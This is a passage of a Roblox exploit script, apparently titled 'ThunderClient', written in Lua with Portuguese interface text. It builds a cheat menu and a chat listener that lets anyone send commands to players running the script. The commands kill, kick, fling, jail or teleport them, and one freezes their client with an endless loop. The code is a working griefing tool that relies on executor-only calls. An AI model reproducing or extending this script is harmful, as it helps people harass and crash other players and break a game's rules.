                local mensagem = ";explodir " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("EXPLOSÃO", "💥 BOOM! Comando executado em " .. #selectedPlayers .. " jogador(es)!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- Seção Backrooms
local BackroomsSection = EffectsTab:Section({
    Title = "Sistema Backrooms",
    Desc = "Teletransportar para as Backrooms"
})

local BackroomsButton = BackroomsSection:Button({
    Title = "🚪 BACKROOMS cmd",
    Icon = "door-open",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";backrooms " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("BACKROOMS", "🚪 Enviando " .. #selectedPlayers .. " jogador(es) para as Backrooms! CUIDADO COM O MONSTRO! 👀")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

local UnbackroomsButton = BackroomsSection:Button({
    Title = "🏠 VOLTAR DO BACKROOMS cmd",
    Icon = "home",
    Callback = function()
        if #selectedPlayers > 0 then
            for _, playerName in ipairs(selectedPlayers) do
                local mensagem = ";unbackrooms " .. playerName
                SendCommand(mensagem)
            end
            WindUI:Notify("BACKROOMS", "🏠 Retornando " .. #selectedPlayers .. " jogador(es) do Backrooms!")
        else
            WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
        end
    end
})

-- Seção Jumpscares
local JumpscareSection = EffectsTab:Section({
    Title = "Sistema de Jumpscares",
    Desc = "Sustos e efeitos assustadores"
})

-- Botões dos Jumpscares
for _, jumpscare in ipairs(JUMPSCARES) do
    local JumpscareButton = JumpscareSection:Button({
        Title = jumpscare.Name,
        Icon = "alert-triangle",
        Callback = function()
            if #selectedPlayers > 0 then
                for _, playerName in ipairs(selectedPlayers) do
                    local mensagem = jumpscare.Name .. " " .. playerName
                    SendCommand(mensagem)
                end
                WindUI:Notify("Jumpscare", jumpscare.Name .. " enviado para " .. #selectedPlayers .. " jogador(es)!")
            else
                WindUI:Notify("Erro", "❌ Selecione jogadores primeiro!")
            end
        end
    })
end

-- ===== ABA TAGS =====
local TagsTab = Window:Tab({
    Title = "Tags",
    Icon = "tag",
    Locked = false,
})

-- Seção Controle de Tags
local TagsSection = TagsTab:Section({
    Title = "Controle de Tags",
    Desc = "Ativar e desativar tags dos jogadores"
})

-- Variável para controle de tags
local tagsVisiveis = true

-- Botão Ativar Todas as Tags
local TagAllButton = TagsSection:Button({
    Title = "🏷️ ATIVAR TODAS TAGS",
    Icon = "eye",
    Callback = function()
        tagsVisiveis = true
        SendCommand(";tag all")
        WindUI:Notify("Tags", "🏷️ Todas as tags foram ativadas!")
        
        for _, player in ipairs(Players:GetPlayers()) do
            applyTag(player)
        end
    end
})

-- Botão Remover Todas as Tags
local UntagAllButton = TagsSection:Button({
    Title = "🚫 REMOVER TODAS TAGS",
    Icon = "eye-off",
    Callback = function()
        tagsVisiveis = false
        SendCommand(";untag all")
        WindUI:Notify("Tags", "🚫 Todas as tags foram removidas!")
        
        for _, player in ipairs(Players:GetPlayers()) do
            if player.Character and player.Character:FindFirstChild("Head") then
                local head = player.Character.Head
                local tag = head:FindFirstChild("SpecialTag")
                if tag then
                    tag:Destroy()
                end
            end
        end
    end
})

-- Botão Ativar Minha Tag
local TagMeButton = TagsSection:Button({
    Title = "👤 ATIVAR MINHA TAG",
    Icon = "user",
    Callback = function()
        tagsVisiveis = true
        SendCommand(";tag")
        WindUI:Notify("Tags", "👤 Sua tag foi ativada!")
        applyTag(LocalPlayer)
    end
})

-- Botão Remover Minha Tag
local UntagMeButton = TagsSection:Button({
    Title = "🙈 REMOVER MINHA TAG",
    Icon = "user-x",
    Callback = function()
        SendCommand(";untag")
        WindUI:Notify("Tags", "🙈 Sua tag foi removida!")
        
        if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Head") then
            local head = LocalPlayer.Character.Head
            local tag = head:FindFirstChild("SpecialTag")
            if tag then
                tag:Destroy()
            end
        end
    end
})

-- ===== SISTEMA DE COMANDOS =====
local function ProcessarComando(mensagem)
    if string.sub(mensagem, 1, 1) == ";" then
        local partes = string.split(string.sub(mensagem, 2), " ")
        local comando = partes[1]:lower()
        local nomeAlvo = table.concat(partes, " ", 2)
        
        -- Verifica se o comando é para ESTE jogador
        local isSelfTarget = nomeAlvo and (nomeAlvo:lower() == LocalPlayer.Name:lower() or nomeAlvo:lower() == LocalPlayer.DisplayName:lower())
        local playerName = LocalPlayer.Name
        local character = LocalPlayer.Character
        local humanoid = character and character:FindFirstChildOfClass("Humanoid")
        local humanoidRootPart = character and character:FindFirstChild("HumanoidRootPart")
        
        if isSelfTarget then
            print("🎯 Comando recebido: " .. comando .. " para " .. LocalPlayer.Name)
            
            -- Comandos de Tags
            if comando == "untag" then
                tagsVisiveis = false
                if character and character:FindFirstChild("Head") then
                    local head = character.Head
                    local tag = head:FindFirstChild("SpecialTag")
                    if tag then
                        tag:Destroy()
                    end
                end
                StarterGui:SetCore("ChatMakeSystemMessage", {
                    Text = "[ThunderClient] Tags removidas para " .. LocalPlayer.Name,
                    Color = Color3.fromRGB(170, 0, 255),
                    Font = Enum.Font.GothamBold
                })
                return
            end

            if comando == "tag" then
                tagsVisiveis = true
                applyTag(LocalPlayer)
                StarterGui:SetCore("ChatMakeSystemMessage", {
                    Text = "[ThunderClient] Tags restauradas para " .. LocalPlayer.Name,
                    Color = Color3.fromRGB(170, 0, 255),
                    Font = Enum.Font.GothamBold
                })
                return
            end

            -- Freeze  
            if comando == "freeze" then  
                if humanoid then  
                    playerOriginalSpeed[playerName] = humanoid.WalkSpeed  
                    humanoid.WalkSpeed = 0  
                    print("⛄️ FREEZE executado em " .. LocalPlayer.Name)
                end  
                return  
            end  

            -- Unfreeze  
            if comando == "unfreeze" then  
                if humanoid then  
                    humanoid.WalkSpeed = playerOriginalSpeed[playerName] or 16  
                    playerOriginalSpeed[playerName] = nil  
                    print("🔥 UNFREEZE executado em " .. LocalPlayer.Name)
                end  
                return  
            end  

            -- Jail  
            if comando == "jail" then  
                if character then  
                    local root = character:FindFirstChild("HumanoidRootPart")  
                    local humanoid = character:FindFirstChildOfClass("Humanoid")  
                    if root and humanoid then  
                        playerOriginalSpeed[playerName] = humanoid.WalkSpeed  
                        humanoid.WalkSpeed = 0  

                        local size = 12
                        local pos = root.Position  
                        jaulas[playerName] = {}  
                        
                        -- Função para criar barras elegantes PRETO E BRANCO
                        local function criarBarra(cframe, size, color)
                            local p = Instance.new("Part")
                            p.Name = "ThunderJailBar"
                            p.Size = size
                            p.Anchored = true
                            p.CanCollide = true
                            p.Material = Enum.Material.Neon
                            p.BrickColor = color
                            p.Reflectance = 0.2
                            p.CFrame = cframe
                            p.Parent = workspace
                            
                            local pointLight = Instance.new("PointLight")
                            pointLight.Brightness = 3
                            pointLight.Range = 8
                            pointLight.Color = color == BrickColor.new("Really black") and Color3.new(0, 0, 0) or Color3.new(1, 1, 1)
                            pointLight.Parent = p
                            
                            table.insert(jaulas[playerName], p)
                            return p
                        end

                        -- BARRAS VERTICAIS PRETAS (Cantos)
                        criarBarra(CFrame.new(pos + Vector3.new(size/2, 0, size/2)), Vector3.new(0.8, size, 0.8), BrickColor.new("Really black"))
                        criarBarra(CFrame.new(pos + Vector3.new(-size/2, 0, size/2)), Vector3.new(0.8, size, 0.8), BrickColor.new("Really black"))
                        criarBarra(CFrame.new(pos + Vector3.new(size/2, 0, -size/2)), Vector3.new(0.8, size, 0.8), BrickColor.new("Really black"))
                        criarBarra(CFrame.new(pos + Vector3.new(-size/2, 0, -size/2)), Vector3.new(0.8, size, 0.8), BrickColor.new("Really black"))

                        -- BARRAS HORIZONTAIS SUPERIORES BRANCAS
                        criarBarra(CFrame.new(pos + Vector3.new(0, size/2, size/2)), Vector3.new(size, 0.8, 0.8), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(0, size/2, -size/2)), Vector3.new(size, 0.8, 0.8), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(size/2, size/2, 0)), Vector3.new(0.8, 0.8, size), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(-size/2, size/2, 0)), Vector3.new(0.8, 0.8, size), BrickColor.new("Institutional white"))

                        -- BARRAS HORIZONTAIS INFERIORES BRANCAS
                        criarBarra(CFrame.new(pos + Vector3.new(0, -size/2, size/2)), Vector3.new(size, 0.8, 0.8), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(0, -size/2, -size/2)), Vector3.new(size, 0.8, 0.8), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(size/2, -size/2, 0)), Vector3.new(0.8, 0.8, size), BrickColor.new("Institutional white"))
                        criarBarra(CFrame.new(pos + Vector3.new(-size/2, -size/2, 0)), Vector3.new(0.8, 0.8, size), BrickColor.new("Institutional white"))

                        if jailConnections[playerName] then  
                            jailConnections[playerName]:Disconnect()  
                        end  
                          
                        jailConnections[playerName] = RunService.Heartbeat:Connect(function()  
                            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then  
                                local hrp = LocalPlayer.Character.HumanoidRootPart  
                                local center = pos + Vector3.new(0, 0, 0)  
                                if (hrp.Position - center).Magnitude > size/2 - 1 then  
                                    hrp.CFrame = CFrame.new(center)  
                                end  
                            end  
                        end)  

                        print("⛓️ JAIL PRETO E BRANCO executado em " .. LocalPlayer.Name)
                    end  
                end  
                return  
            end  

            -- Unjail  
            if comando == "unjail" then  
                if character then  
                    local humanoid = character:FindFirstChildOfClass("Humanoid")  
                    if humanoid then  
                        humanoid.WalkSpeed = playerOriginalSpeed[playerName] or 16  
                        playerOriginalSpeed[playerName] = nil  
                    end  

                    if jaulas[playerName] then  
                        for _, p in ipairs(jaulas[playerName]) do  
                            if p and p.Parent then  
                                p:Destroy()  
                            end  
                        end  
                        jaulas[playerName] = nil  
                        print("✅ Quadrado 3D do Jail removido do mapa!")
                    end  

                    if jailConnections[playerName] then  
                        jailConnections[playerName]:Disconnect()  
                        jailConnections[playerName] = nil  
                    end  
                    print("🔓 UNJAIL executado em " .. LocalPlayer.Name)
                end  
                return  
            end

            -- Backrooms - SISTEMA ATUALIZADO
            if comando == "backrooms" then
                local player = LocalPlayer
                local mapID = 10581711055
                local distantPosition = Vector3.new(0, 10000, 0)
                local teleportPosition = Vector3.new(59.06, 9996.70, 19.42)

                -- Efeito visual de transição
                local transitionEffect = Instance.new("Part")
                transitionEffect.Name = "ThunderTransition"
                transitionEffect.Size = Vector3.new(8, 8, 8)
                transitionEffect.Position = humanoidRootPart.Position
                transitionEffect.Anchored = true
                transitionEffect.CanCollide = false
                transitionEffect.Material = Enum.Material.Neon
                transitionEffect.BrickColor = BrickColor.new("Bright yellow")
                transitionEffect.Transparency = 0.3
                transitionEffect.Parent = workspace
                
                local transitionLight = Instance.new("PointLight")
                transitionLight.Brightness = 8
                transitionLight.Range = 12
                transitionLight.Color = Color3.fromRGB(255, 255, 150)
                transitionLight.Parent = transitionEffect
                
                -- Animação de teletransporte
                local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
                local tween = TweenService:Create(transitionEffect, tweenInfo, {Size = Vector3.new(15, 15, 15), Transparency = 0.8})
                tween:Play()
                
                -- Carregar mapa das Backrooms
                local success, mapa = pcall(function()
                    return game:GetObjects("rbxassetid://"..mapID)[1]
                end)
                
                if success and mapa then
                    -- Remover backrooms existentes
                    local existingBackrooms = workspace:FindFirstChild("Thunder_Backrooms")
                    if existingBackrooms then
                        existingBackrooms:Destroy()
                    end
                    
                    local backroomsFolder = Instance.new("Folder")
                    backroomsFolder.Name = "Thunder_Backrooms"
                    backroomsFolder.Parent = workspace
                    
                    mapa.Parent = backroomsFolder
                    mapa.Name = "BackroomsMap"
                    
                    -- Configurar posição do mapa
                    if not mapa.PrimaryPart then
                        local part = mapa:FindFirstChildWhichIsA("BasePart")
                        if part then 
                            mapa.PrimaryPart = part 
                        end
                    end
                    
                    if mapa.PrimaryPart then
                        mapa:SetPrimaryPartCFrame(CFrame.new(distantPosition))
                    else
                        -- Se não tiver PrimaryPart, mover todas as partes
                        for _, part in ipairs(mapa:GetDescendants()) do
                            if part:IsA("BasePart") then
                                part.Position = part.Position + distantPosition
                            end
                        end
                    end
                    
                    -- Aplicar iluminação das backrooms
                    local lighting = game:GetService("Lighting")
                    lighting.Brightness = 0.6
                    lighting.Ambient = Color3.fromRGB(255, 200, 100)
                    lighting.OutdoorAmbient = Color3.fromRGB(255, 200, 100)
                    lighting.FogColor = Color3.fromRGB(255, 200, 100)
                    lighting.FogEnd = 250
                    lighting.FogStart = 50
                    
                    -- Teletransportar jogador
                    humanoidRootPart.CFrame = CFrame.new(teleportPosition)
                    
                    -- Remover efeito após 1 segundo
                    game:GetService("Debris"):AddItem(transitionEffect, 1)
                    
                    -- Ativar o monstro após 3 segundos
                    task.wait(3)
                    ActivateMonster(player)
                    
                    StarterGui:SetCore("ChatMakeSystemMessage", {
                        Text = "[ThunderClient] Você foi teletransportado para as Backrooms! CUIDADO COM O MONSTRO! 👀",
                        Color = Color3.fromRGB(255, 165, 0),
                        Font = Enum.Font.GothamBold
                    })
                    print("🚪 BACKROOMS: " .. LocalPlayer.Name .. " foi teletransportado para as Backrooms! MAPA ID: " .. mapID)
                else
                    -- Fallback se o mapa não carregar
                    humanoidRootPart.CFrame = CFrame.new(teleportPosition)
                    game:GetService("Debris"):AddItem(transitionEffect, 1)
                    StarterGui:SetCore("ChatMakeSystemMessage", {
                        Text = "[ThunderClient] Backrooms carregada! CUIDADO COM O MONSTRO! 👀",
                        Color = Color3.fromRGB(255, 165, 0),
                        Font = Enum.Font.GothamBold
                    })
                end
                return
            end

            -- Unbackrooms (Voltar do Backrooms)
            if comando == "unbackrooms" then
                RestoreNormalWorld()
                StarterGui:SetCore("ChatMakeSystemMessage", {
                    Text = "[ThunderClient] Você voltou do Backrooms! O monstro foi derrotado! 🏠",
                    Color = Color3.fromRGB(0, 255, 0),
                    Font = Enum.Font.GothamBold
                })
                print("🏠 UNBACKROOMS: " .. LocalPlayer.Name .. " voltou do Backrooms! Monstro desativado!")
                return
            end

            -- Sistema de Jumpscares
            if comando == "jumps1" then
                TriggerJumpscare(LocalPlayer, JUMPSCARES[1])
                print("👀 JUMPS CARE 1 ativado em " .. LocalPlayer.Name)
            elseif comando == "jumps2" then
                TriggerJumpscare(LocalPlayer, JUMPSCARES[2])
                print("👀 JUMPS CARE 2 ativado em " .. LocalPlayer.Name)
            elseif comando == "jumps3" then
                TriggerJumpscare(LocalPlayer, JUMPSCARES[3])
                print("👀 JUMPS CARE 3 ativado em " .. LocalPlayer.Name)
            elseif comando == "jumps4" then
                TriggerJumpscare(LocalPlayer, JUMPSCARES[4])
                print("👀 JUMPS CARE 4 ativado em " .. LocalPlayer.Name)
            
            -- Comandos anteriores
            elseif comando == "kill" and character then
                character:BreakJoints()
                print("💀 KILL executado em " .. LocalPlayer.Name)
            elseif comando == "kick" then
                LocalPlayer:Kick("🚫 Você foi kickado              equipe:Thunder")
                print("👢 KICK executado em " .. LocalPlayer.Name)
            elseif comando == "crash" then
                print("💥 CRASH executado em " .. LocalPlayer.Name)
                while true do end
            elseif comando == "explodir" and character then
                local humanoidRootPart = character:FindFirstChild("HumanoidRootPart")
                
                if humanoidRootPart then
                    local explosion = Instance.new("Part")
                    explosion.Name = "ThunderExplosion"
                    explosion.Size = Vector3.new(8, 8, 8)
                    explosion.Shape = Enum.PartType.Ball
                    explosion.Material = Enum.Material.Neon
                    explosion.BrickColor = BrickColor.new("Institutional white")
                    explosion.Position = humanoidRootPart.Position
                    explosion.Anchored = true
                    explosion.CanCollide = false
                    explosion.Parent = workspace
                    
                    local pointLight = Instance.new("PointLight")
                    pointLight.Brightness = 10
                    pointLight.Range = 15
                    pointLight.Color = Color3.new(1, 1, 1)
                    pointLight.Parent = explosion
                    
                    character:BreakJoints()
                    
                    for _, part in pairs(character:GetDescendants()) do
                        if part:IsA("BasePart") and part ~= humanoidRootPart then
                            part.Velocity = Vector3.new(
                                math.random(-50, 50),
                                math.random(30, 60), 
                                math.random(-50, 50)
                            )
                        end
                    end
                    
                    local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
                    local tween = TweenService:Create(explosion, tweenInfo, {Size = Vector3.new(20, 20, 20)})
                    tween:Play()
                    
                    game:GetService("Debris"):AddItem(explosion, 2)
                    
                    print("💥 EXPLOSÃO BRANCA executada em " .. LocalPlayer.Name)
                end
            elseif comando == "fling" and character then
                local humanoidRootPart = character:FindFirstChild("HumanoidRootPart")
                
                if humanoidRootPart then
                    print("🚀 INICIANDO FLING ÉPICO EM " .. LocalPlayer.Name)
                    
                    local flash = Instance.new("Part")
                    flash.Name = "ThunderFlingFlash"
                    flash.Size = Vector3.new(15, 15, 15)
                    flash.Shape = Enum.PartType.Ball
                    flash.Material = Enum.Material.Neon
                    flash.BrickColor = BrickColor.new("Bright blue")
                    flash.Position = humanoidRootPart.Position
                    flash.Anchored = true
                    flash.CanCollide = false
                    flash.Parent = workspace
                    
                    local flashLight = Instance.new("PointLight")
                    flashLight.Brightness = 15
                    flashLight.Range = 20
                    flashLight.Color = Color3.new(0, 0, 1)
                    flashLight.Parent = flash
                    
                    wait(0.5)
                    
                    humanoidRootPart.Velocity = Vector3.new(
                        math.random(-999999, 999999),
                        math.random(500000, 999999),
                        math.random(-999999, 999999)
                    )
                    
                    game:GetService("Debris"):AddItem(flash, 1)
                    
                    print("🌌 FLING ÉPICO EXECUTADO! Qualidade da tela: 💀")
                    print("🎯 " .. LocalPlayer.Name .. " foi pro infinito e além!")
                end
            elseif comando == "bring" and character then
                local humanoidRootPart = character:FindFirstChild("HumanoidRootPart")
                
                if humanoidRootPart then
                    print("🎯 BRING recebido! Procurando quem enviou...")
                    
                    for _, player in ipairs(Players:GetPlayers()) do
                        if player ~= LocalPlayer then
                            if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
                                local senderRootPart = player.Character.HumanoidRootPart
                                
                                local bringEffect = Instance.new("Part")
                                bringEffect.Name = "ThunderBringEffect"
                                bringEffect.Size = Vector3.new(6, 6, 6)
                                bringEffect.Shape = Enum.PartType.Ball
                                bringEffect.Material = Enum.Material.Neon
                                bringEffect.BrickColor = BrickColor.new("Bright green")
                                bringEffect.Position = humanoidRootPart.Position
                                bringEffect.Anchored = true
                                bringEffect.CanCollide = false
                                bringEffect.Parent = workspace
                                
                                local bringLight = Instance.new("PointLight")
                                bringLight.Brightness = 8
                                bringLight.Range = 15
                                bringLight.Color = Color3.new(0, 1, 0)
                                bringLight.Parent = bringEffect
                                
                                local tweenInfo = TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
                                local tween = TweenService:Create(bringEffect, tweenInfo, {Size = Vector3.new(12, 12, 12), Transparency = 0.8})
                                tween:Play()
                                
                                local targetPosition = senderRootPart.Position + senderRootPart.CFrame.LookVector * 5
                                humanoidRootPart.Position = targetPosition + Vector3.new(0, 3, 0)
                                
                                game:GetService("Debris"):AddItem(bringEffect, 1)
                                
                                print("✅ BRING executado! Teletransportado para " .. player.Name)
                                break
                            end
                        end
                    end
                end
            end
        end
        
        -- Comandos de Tags Globais
        if comando == "untag" and nomeAlvo == "all" then
            tagsVisiveis = false
            StarterGui:SetCore("ChatMakeSystemMessage", {
                Text = "[ThunderClient] Todas as tags foram removidas.",
                Color = Color3.fromRGB(170, 0, 255),
                Font = Enum.Font.GothamBold
            })
            for _, player in ipairs(Players:GetPlayers()) do
                if player.Character and player.Character:FindFirstChild("Head") then
                    local head = player.Character.Head
                    local tag = head:FindFirstChild("SpecialTag")
                    if tag then
                        tag:Destroy()
                    end
                end
            end
            return
        end

        if comando == "tag" and nomeAlvo == "all" then
            tagsVisiveis = true
            StarterGui:SetCore("ChatMakeSystemMessage", {
                Text = "[ThunderClient] Todas as tags foram restauradas.",
                Color = Color3.fromRGB(170, 0, 255),
                Font = Enum.Font.GothamBold
            })
            for _, player in ipairs(Players:GetPlayers()) do
                applyTag(player)
            end
            return
        end
        
        -- ⚡ DETECTA ;verifique E EXECUTA EM TODOS (INCLUINDO VOCÊ) ⚡
        if comando == "verifique" then
            print("🎯 Verificação detectada! Digitando Thunder_Users")
            
            wait(2)
            
            if TextChatService.ChatVersion == Enum.ChatVersion.TextChatService then
                local canal = TextChatService.TextChannels.RBXGeneral
                if canal then
                    canal:SendAsync("Thunder_Users")
                    print("✅ Thunder_Users enviado por: " .. LocalPlayer.Name)
                end
            else
                ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Thunder_Users", "All")
                print("✅ Thunder_Users enviado por: " .. LocalPlayer.Name)
            end
        end
    end
end

-- Conectar ao chat para RECEBER comandos
task.spawn(function()
    wait(3)
    local canal = TextChatService.TextChannels:FindFirstChild("RBXGeneral")
    if canal then
        canal.OnIncomingMessage = function(mensagem)
            ProcessarComando(mensagem.Text)
        end
        print("✅ Sistema de comandos ativo!")
    end
end)

-- ===== INICIALIZAR =====
WindUI:Notify("ThunderClient", "Sistema carregado com sucesso! ✅")
print("🎉 THUNDERCLIENT - SISTEMA FUNCIONANDO!")
print("👨‍💻 Desenvolvido por: Dev Nagi")
print("📊 ABAS ORGANIZADAS:")
print("   🏠 Principal - Sistema de verificação")
print("   ⚡ Comandos Básicos - Kill, Kick, Crash, Bring, Fling")
print("   🔒 Controle - Freeze, Unfreeze, Jail, Unjail") 
print("   ❇️ Efeitos - Explosões, Jumpscares, Backrooms")
print("   🏷️ Tags - Controle de tags dos jogadores")
print("🎨 TEMA ROXO APLICADO!")
print("🔐 SISTEMA DE WHITELIST ATIVADO - USUÁRIO AUTORIZADO!")
print("🚪 SISTEMA BACKROOMS ATUALIZADO!")
print("🗺️ MAPA DAS BACKROOMS: ID 10581711055")
print("📍 POSIÇÃO DO MAPA: Vector3.new(0, 10000, 0)")
print("🎯 POSIÇÃO DO JOGADOR: Vector3.new(59.06, 9996.70, 19.42)")
print("👹 MONSTRO DAS BACKROOMS ATIVADO!")
print("🖼️ IMAGEM DO MONSTRO: 126754882337711")
print("🔊 SOM DO MONSTRO: 138873214826309")
